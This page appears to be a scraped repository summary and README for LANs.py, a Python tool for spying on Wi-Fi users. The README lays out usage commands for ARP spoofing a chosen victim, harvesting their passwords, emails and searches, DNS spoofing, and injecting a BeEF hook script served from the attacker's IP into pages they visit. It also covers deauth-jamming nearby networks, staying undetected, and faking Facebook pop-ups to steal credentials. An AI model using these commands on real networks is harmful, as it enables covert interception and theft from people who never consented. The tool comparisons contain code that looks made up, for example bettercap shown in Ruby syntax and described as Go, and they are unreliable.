Convert Figma logo to code with AI

DanMcInerney logoLANs.py

Inject code and spy on wifi users

2,612
488
2,612
17
View on GitHub

Top Related Projects

byt3bl33d3r's avatar

MITMf

3,634

Framework for Man-In-The-Middle attacks

trustedsec's avatar

social-engineer-toolkit

12,590

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

lgandx's avatar

Responder

6,253

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

bettercap's avatar

bettercap

18,715

The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM attacks.

s0lst1c3's avatar

eaphammer

2,393

Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.

Quick Overview

LANs.py is a Python-based tool for automated network and vulnerability analysis. It performs various network attacks and reconnaissance techniques, including ARP spoofing, DNS spoofing, and packet sniffing, to help security professionals identify potential vulnerabilities in local area networks.

Pros

  • Comprehensive suite of network analysis tools in a single package
  • Easy-to-use command-line interface for quick deployment
  • Actively maintained and updated with new features
  • Supports multiple attack vectors and reconnaissance techniques

Cons

  • Potential for misuse if not used responsibly
  • Requires root/administrator privileges, which may pose security risks
  • Limited documentation for some advanced features
  • May trigger antivirus or intrusion detection systems

Code Examples

  1. Performing ARP spoofing:
from LANs import LANs

lans = LANs()
lans.arp_spoof('192.168.1.1', '192.168.1.100')
  1. Sniffing network traffic:
from LANs import LANs

lans = LANs()
lans.packet_sniffer(interface='eth0', filter='tcp port 80')
  1. DNS spoofing:
from LANs import LANs

lans = LANs()
lans.dns_spoof('example.com', '192.168.1.100')

Getting Started

To get started with LANs.py:

  1. Clone the repository:

    git clone https://github.com/DanMcInerney/LANs.py.git

  2. Install dependencies:

    pip install -r requirements.txt

  3. Run LANs.py with root privileges:

    sudo python LANs.py -h

  4. Choose an attack or reconnaissance method and follow the command-line prompts.

Note: Always use this tool responsibly and only on networks you have permission to test.

Competitor Comparisons

byt3bl33d3r logo

MITMf

3,634

Framework for Man-In-The-Middle attacks

Pros of MITMf

  • More comprehensive feature set, including advanced MITM attacks and plugins
  • Active development and community support
  • Better documentation and usage instructions

Cons of MITMf

  • More complex setup and configuration
  • Steeper learning curve for beginners
  • Requires more system resources due to additional features

Code Comparison

LANs.py:

def start_monitor_mode(mon_iface):
    os.system('ifconfig %s down' % mon_iface)
    os.system('iwconfig %s mode monitor' % mon_iface)
    os.system('ifconfig %s up' % mon_iface)

MITMf:

def start_monitor_mode(interface):
    subprocess.call(['ifconfig', interface, 'down'])
    subprocess.call(['iwconfig', interface, 'mode', 'monitor'])
    subprocess.call(['ifconfig', interface, 'up'])

Both projects implement similar functionality for starting monitor mode on a wireless interface. However, MITMf uses the subprocess module, which is generally considered safer and more flexible than os.system().

MITMf offers a more extensive set of features and active development, making it suitable for advanced users and complex scenarios. LANs.py, on the other hand, is simpler and easier to use for basic MITM attacks, making it a good choice for beginners or quick tasks.

trustedsec logo

social-engineer-toolkit

12,590

The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here.

Pros of social-engineer-toolkit

  • More comprehensive toolkit with a wider range of social engineering attacks
  • Actively maintained with regular updates and contributions
  • Includes a user-friendly menu-driven interface for easier use

Cons of social-engineer-toolkit

  • Larger codebase and more complex setup process
  • Requires more dependencies and system resources
  • May have a steeper learning curve for beginners

Code Comparison

LANs.py:

def start_monitor_mode(interface):
    os.system('ifconfig %s down' % interface)
    os.system('iwconfig %s mode monitor' % interface)
    os.system('ifconfig %s up' % interface)

social-engineer-toolkit:

def update_config(self):
    config = ConfigParser.ConfigParser()
    config.read(os.path.join(core.setdir + "config", "set_config"))
    return config

The code snippets show that LANs.py focuses on network interface manipulation, while social-engineer-toolkit deals with configuration management, reflecting their different purposes and scopes.

lgandx logo

Responder

6,253

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Pros of Responder

  • More comprehensive set of attack vectors and protocols supported
  • Active development with frequent updates and bug fixes
  • Better integration with other penetration testing tools

Cons of Responder

  • Steeper learning curve due to more complex features
  • Potentially more resource-intensive on the attacking machine
  • May trigger more alerts on well-protected networks

Code Comparison

LANs.py:

def start_http_server():
    Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
    httpd = SocketServer.TCPServer(("", HTTP_PORT), Handler)
    print "[*] HTTP server running on port", HTTP_PORT
    httpd.serve_forever()

Responder:

def Start_HTTP_Server():
    try:
        from HTTPServer import HTTPServer
        HTTPServer().start()
    except Exception as e:
        print(color("[!] Error starting HTTP server: %s" % str(e)))

Both projects implement HTTP servers, but Responder's implementation is more modular and error-handled. LANs.py uses Python's built-in libraries, while Responder employs a custom HTTPServer class for enhanced functionality.

Responder offers a more feature-rich and actively maintained solution for network attacks and penetration testing. However, LANs.py may be simpler to use for basic scenarios and potentially less detectable in some environments.

bettercap logo

bettercap

18,715

The Swiss Army knife for 802.11, BLE, HID, CAN-bus, IPv4 and IPv6 networks reconnaissance and MITM attacks.

Pros of bettercap

  • More comprehensive and feature-rich network attack and monitoring tool
  • Actively maintained with regular updates and improvements
  • Supports a wider range of protocols and attack vectors

Cons of bettercap

  • Steeper learning curve due to its extensive feature set
  • Requires more system resources to run effectively
  • May be overkill for simple network analysis tasks

Code Comparison

LANs.py:

def start_monitor_mode(mon_iface):
    os.system('ifconfig %s down' % mon_iface)
    os.system('iwconfig %s mode monitor' % mon_iface)
    os.system('ifconfig %s up' % mon_iface)

bettercap:

def start_wifi_monitor(iface)
  Shell.ifconfig(iface, "down")
  Shell.iwconfig(iface, "mode monitor")
  Shell.ifconfig(iface, "up")
end

Both projects implement similar functionality for starting monitor mode on a wireless interface, but bettercap uses a more modular approach with separate Shell methods for each command.

LANs.py is a simpler, Python-based tool focused on basic network scanning and ARP spoofing. It's easier to use for beginners but has limited features compared to bettercap.

bettercap, written in Go, offers a more comprehensive suite of network analysis and attack tools. It's more powerful and flexible but requires more expertise to utilize fully.

s0lst1c3 logo

eaphammer

2,393

Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.

Pros of eaphammer

  • More focused on enterprise wireless network attacks, particularly against WPA2-Enterprise networks
  • Includes advanced features like hostile portal attacks and indirect wireless pivots
  • Actively maintained with regular updates and improvements

Cons of eaphammer

  • Steeper learning curve due to more complex features and setup
  • Requires more dependencies and setup compared to the simpler LANs.py
  • Less suitable for quick, basic LAN reconnaissance

Code Comparison

eaphammer (setup.py):

setup(
    name='eaphammer',
    version='1.13.0',
    author='Gabriel Ryan',
    author_email='gryan@gdssecurity.com',
    description='Targeted evil twin attacks against WPA2-Enterprise networks',
    license='GPLv3',
    packages=find_packages(),
    install_requires=[
        'tqdm',
        'pyOpenSSL',
        'scapy',
    ],
)

LANs.py (LANs.py):

def main(argv):
    global victimIP, routerIP, victimMAC, routerMAC, interface, arpWatch, ipf

    if len(argv) < 1:
        usage()
        sys.exit(1)

    try:
        opts, args = getopt.getopt(argv, 'hi:v:r:',
                                   ['help', 'interface=', 'victim=', 'router='])
    except getopt.GetoptError:
        usage()
        sys.exit(2)

Both projects serve different purposes, with eaphammer being more specialized for enterprise wireless attacks, while LANs.py is simpler and focused on basic LAN reconnaissance and ARP spoofing.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

LANs.py

*** NOTE *** I do not maintain this anymore. I highly suggest using bettercap instead for ARP and MITM needs.

  • Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.

    • Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

  • Also can be used to continuosly jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine tuned to allow jamming of everyone or even just one client. (Cannot jam WiFi and spy simultaneously)

Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, and a wireless card capable of promiscuous mode if you choose not to use the -ip option

Tested on Kali 1.0. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC]
                [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n]
                [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP]
                [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL]
                [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [--packets PACKETS]
                [--directedonly] [--accesspoint ACCESSPOINT]

#Usage

Common usage:

python LANs.py -u -p

Active target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There's no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you're ready and pick your target which it will then ARP spoof.

Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received. Screenshot: http://i.imgur.com/kQofTYP.png

Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.

Another common usage:

python LANs.py -u -p -d -ip 192.168.0.10

-d: open an xterm with driftnet to see all images they view

-ip: target this IP address and skip the active targeting at the beginning

HTML injection:

python LANs.py -b http://192.168.0.5:3000/hook.js

Inject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in <script> tags so you can really enter any location of a javascript file. Attempts to insert it after the first tag found in the page's HTML.

python LANs.py -c '<title>Owned.</title>'

Inject arbitrary HTML into pages the victim visits. First tries to inject it after the first <head> tag and failing that, injects prior to the first </head> tag. This example will change the page title to 'Owned.'

Read from pcap:

python LANs.py -pcap libpcapfilename -ip 192.168.0.10

To read from a pcap file you must include the target's IP address with the -ip option. It must also be in libpcap form which is the most common anyway. One advantage of reading from a pcap file is that you do not need to be root to execute the script.

DNS spoofing

python LANs.py -a -r 80.87.128.67

python LANs.py -dns eff.org

Example 1: The -a option will spoof every single DNS request the victim makes and when used in conjuction with -r it will redirect them to -r's argument address. The victim will be redirected to stallman.org (80.87.128.67) no matter what they type in the address bar.

Example 2: This will spoof the domain eff.org and subdomains of eff.org. When there is no -r argument present with the -a or -dns arguments the script will default to sending the victim to the attacker's IP address. If the victim tries to go to eff.org they will be redirected to the attacker's IP.

Most aggressive usage:

python LANs.py -v -d -p -n -na -set -a -r 80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10

Jam all WiFi networks:

python LANs.py

All options:

Normal Usage:

  • -b BEEF_HOOK_URL: copy the BeEF hook URL to inject it into every page the victim visits, eg: -b http://192.168.1.10:3000/hook.js

  • -c 'HTML CODE': inject arbitrary HTML code into pages the victim visits; include the quotes when selecting HTML to inject

  • -d: open an xterm with driftnet to see all images they view

  • -dns DOMAIN: spoof the DNS of DOMAIN. e.g. -dns facebook.com will DNS spoof every DNS request to facebook.com or subdomain.facebook.com

  • -a: Spoof every DNS response the victim makes, effectively creating a captive portal page; -r option can be used with this

  • -r IPADDRESS: only to be used with the -dns DOMAIN option; redirect the user to this IPADDRESS when they visit DOMAIN

  • -u: prints URLs visited; truncates at 150 characters and filters image/css/js/woff/svg urls since they spam the output and are uninteresting

  • -i INTERFACE: specify interface; default is first interface in ip route, eg: -i wlan0

  • -ip: target this IP address

  • -n: performs a quick nmap scan of the target

  • -na: performs an aggressive nmap scan in the background and outputs to [victim IP address].nmap.txt

  • -p: print username/passwords for FTP/IMAP/POP/IRC/HTTP, HTTP POSTs made, all searches made, incoming/outgoing emails, and IRC messages sent/received

  • -pcap PCAP_FILE: parse through all the packets in a pcap file; requires the -ip [target's IP address] argument

  • -rmac ROUTER_MAC: enter router MAC here if you're having trouble getting the script to automatically fetch it

  • -rip ROUTER_IP: enter router IP here if you're having trouble getting the script to automatically fetch it

  • -v: show verbose URLs which do not truncate at 150 characters like -u

Wifi Jamming:

  • -s MAC_Address_to_skip: Specify a MAC address to skip deauthing. Example: -s 00:11:BB:33:44:AA
  • -ch CHANNEL: Limit wifijammer to single channel
  • -m MAXIMUM: Maximum number of clients to deauth. Use if moving around so as to prevent deauthing client/AP pairs outside of current range.
  • -no: Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
  • -t TIME_INTERVAL: Time between each deauth packet. Default is maximum. If you see scapy errors like 'no buffer space' try: -t .00001
  • --packets NUMBER: Number of packets to send in each deauth burst. Default is 1 packet.
  • --directedonly: Don't send deauth packets to the broadcast address of APs and only send to client/AP pairs
  • --accesspoint ROUTER_MAC: Enter the MAC address of a specific AP to target.

Clean up

Upon receiving a Ctrl-C:

-Turns off IP forwarding

-Flushes iptables firewall

-Individually restores the router and victim's ARP tables

Technical details

This script uses a python nfqueue-bindings queue wrapped in a Twisted IReadDescriptor to feed packets to callback functions. nfqueue-bindings is used to drop and forward certain packets. Python's scapy library does the work to parse and inject packets.

Injecting code undetected is a dicey game, if a minor thing goes wrong or the server the victim is requesting data from performs things in unique or rare way then the user won't be able to open the page they're trying to view and they'll know something's up. This script is designed to forward packets if anything fails so during usage you may see lots of "[!] Injected packet for www.domain.com" but only see one or two domains on the BEeF panel that the browser is hooked on. This is OK. If they don't get hooked on the first page just wait for them to browse a few other pages. The goal is to be unnoticeable. My favorite BEeF tools are in Commands > Social Engineering. Do things like create an official looking Facebook pop up saying the user's authentication expired and to re-enter their credentials.